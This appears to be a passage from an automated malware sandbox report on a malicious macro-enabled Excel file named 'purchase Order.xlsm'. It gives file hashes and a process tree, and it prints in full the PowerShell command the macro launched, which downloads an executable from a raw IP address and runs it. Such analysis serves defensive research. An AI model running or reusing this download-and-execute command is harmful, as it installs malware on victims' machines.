                  Preview: PK..........!................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................TKO#1..#....I..Z.:...."-..L.v..8@..q....P.e.q..-.....3&2..........Y+.?..EE....<.b.$.'?....T1.S+....)Iu...sd....i&#.9.P......>..u..b2..)<.\.,.x.$....V..T+.+.r..".Z.@..(..|.z.W...0..C......P(.mO....\.d4V....8v..V..4..a..')...Ph...s.@.p..."...7.....=.d.:?E..= S.:Ue./.0...:.'...PL...t.......r(..g.=n.......H...q..lW.C..$..r...v....|../.\.|..k.c..&.)D......zA..0e..i.7K.E....w...j..h.~.N^.......PK..........!..U0#.
                  C:\Users\user\Desktop\~$purchase Order.xlsm
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:true
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                  Static File Info

                  General

                  File type:Microsoft Excel 2007+
                  Entropy (8bit):7.959887971852356
                  TrID:
                  • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                  • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                  • ZIP compressed archive (8000/1) 8.08%
                  File name:purchase Order.xlsm
                  File size:150286
                  MD5:d1ad5761044b2abb12b78700f1a3a537
                  SHA1:7fed2064ae3681227f674608df64ff1d7c45a2ee
                  SHA256:8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
                  SHA512:0c6ec74a014e337ce2153e682ed5bbc3c059e5d3b6b2ec90e6ab3c74eeccff055c4c776020441471d6184721b87f5391fe4566cb6e9c7a0f3548816abc57d0ee
                  SSDEEP:3072:rEaWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6y7:rLWUMdF+Bcli6I37RBwcblAP
                  File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                  File Icon

                  Icon Hash:e4e2aa8aa4bcbcac

                  Network Behavior

                  No network behavior found

                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:18:08:21
                  Start date:27/10/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13ff90000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:08:23
                  Start date:27/10/2021
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
                  Imagebase:0x13f9b0000
                  File size:473600 bytes
                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:18:08:27
                  Start date:27/10/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exe
                  Imagebase:0xffa10000
                  File size:3229696 bytes
                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:08:28
                  Start date:27/10/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                  Imagebase:0xffa10000
                  File size:3229696 bytes
                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >

                    Executed Functions

                    Memory Dump Source
                    • Source File: 00000002.00000002.434197738.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9159ba7c0107187584d1350777e86e0c1e71770eace63e098bde94dd1ac00e42
                    • Instruction ID: 64e75b132e1e3f659f6f384d4ceee1173cec8ddee88ce6c545b83ec246b7c540
                    • Opcode Fuzzy Hash: 9159ba7c0107187584d1350777e86e0c1e71770eace63e098bde94dd1ac00e42
                    • Instruction Fuzzy Hash: D211846284E7C14FD7039B385D296A07FB1AF53248B0A06DBD4C4DE0B3E6580A69C7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions